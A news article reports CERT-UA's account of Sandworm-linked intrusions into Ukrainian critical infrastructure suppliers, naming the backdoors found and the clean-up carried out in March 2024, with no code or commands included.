Ukrainian CERT describes attacks on critical infrastructure
Ukraine's CERT has apparently prevented attacks on critical infrastructure. The authority now describes its findings.
(Bild: vectorfusionart/Shutterstock.com)
Ukraine's CERT has described attacks on the country's critical infrastructure. According to the report, the Russian-linked cyber gang Sandworm planned cyber sabotage against almost 20 KRITIS objects.
Unlike many cyberwar stories from the war between Russia and Ukraine, this time it is not about website defacements or (D)DoS attacks on regular IT systems. These attacks had the potential to cause real damage, as they targeted critical infrastructure such as the network operator Kyivstar or the Internet landline provider Ukrtelecom. However, the CERT does not report any specific damage and there are no reports of such outages in the general news from Ukraine during the period in question. This suggests that the attacks were repelled in time or were not as critical as the targets suggest; presumably a mixture of both.
Compromised supply chains
In an article, CERT-UA describes how it discovered various backdoors, malware and indications of the malicious actors' plans when cleaning up compromised machines. For example, the IT forensics experts found the Queueseed backdoor (also known as Knuckletouch and Kapeka since 2022) on the infiltrated machines. They also found Linux variants of it called Biasboat and Loadgrip. They discovered these on process automation computers, whereby in one case, Biasboat was apparently intended for another server, as it was encrypted for this purpose and provided with a machine ID that the attackers had previously given to the target server.
The CERT-UA found compromised computers in three "supply chains". The attackers had prepared these for the movement and development of cyberattacks on company networks. The IT specialists found prepared PHP webshells and PHP tunnels on the computers, which the attackers can use to access infiltrated systems. Between March 7 and 15, CERT informed the identified companies and initiated countermeasures. During the CERT-UA clean-up operation, the circumstances of the initial infection were identified, malicious software was removed and analyzed and a chronological sequence of events was created. Security technology was also installed, as some Linux backdoors had already been set up in 2023.
The CERT-UA further explains that the attackers most likely belong to the criminal organization Sandworm. According to CERT's assessment, the unauthorized access to the significant number of heat, water and energy suppliers was carried out to support missile attacks on infrastructure in Ukraine in spring 2024.
The analysis by the Ukrainian CERT concludes with a longer list of Indicators of Compromise (IOCs).
(dmk)